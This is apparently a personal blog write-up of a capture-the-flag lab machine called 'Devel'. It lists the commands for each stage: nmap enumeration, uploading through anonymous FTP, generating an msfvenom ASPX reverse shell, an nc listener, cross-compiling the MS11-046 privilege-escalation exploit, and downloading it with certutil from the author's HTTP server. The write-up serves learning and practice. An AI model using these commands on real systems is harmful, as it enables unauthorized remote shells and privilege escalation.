nmap enumeration

nmap -A -p- -T4 -vvv -oN devel

FTP upload test

From nmap result it says ftp allows anonymous login. Now I test whether I can upload files.

I can also do directory and file listing.

Test if the files in FTP reflects the page in the web.

The iistart.htm is also available.

Test if the file I upload can be displayed in the web.
I create a simple htm file which will pop up a javascript dialog, then i upload the file to the ftp.


Generate a reverse shell aspx

msfvenom -p windows/shell_reverse_tcp lhost= lport=4444 -f aspx -o devel.aspx

This file will then be uploaded to the ftp.

Get the windows shell

nc -lvnp 4444

With the browser go to to initiate the reverse connection.

Understand the system and get the exploit


6.1.7600 N/A Build 7600 is the version after searching and testing a few exploits, this one works the best – https://github.com/abatchy17/WindowsExploits/blob/master/MS11-046/40564.c the condition to use this exploit is first get a valid logon which I have already done and be able to execute the exploit locally.

Also although the virtual machine is 64-bit the Windows 7 is a 32-bit version.

Compile the source code

I will be compiling the source code in linux locally then I will set up a http server with python, and I use certutil in Devel to download the compiled binary.

Cross compiler is required to compile the windows binary within linux environment.
apt install mingw-w64

I would need to compile the exploit in 32-bit binary in order to run in Devel.
i686-w64-mingw32-gcc 40564.c -o devel.exe -lws2_32

Pwn devel

Setup a http server in my kali machine
python3 -m http.server 80

Then on Devel use certutil -urlcache -f C:\Users\Public\Downloads\devel.exe


From now I can get both the babis user and Administrator’s flag.

Clean up

After I have got the flags, I exit from the escalated environment to revert backt to the original user, then delete the devel.exe which I downloaded.



Although this is an easy machine it provides good practice to try to do the hack manually, there are other solutions which use metasploit’s exploits to do the hack but I want to try to see if a manual way is possible, I also wanted to cross compile another cpp file to test if the exploit works on Devel, until next time.


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s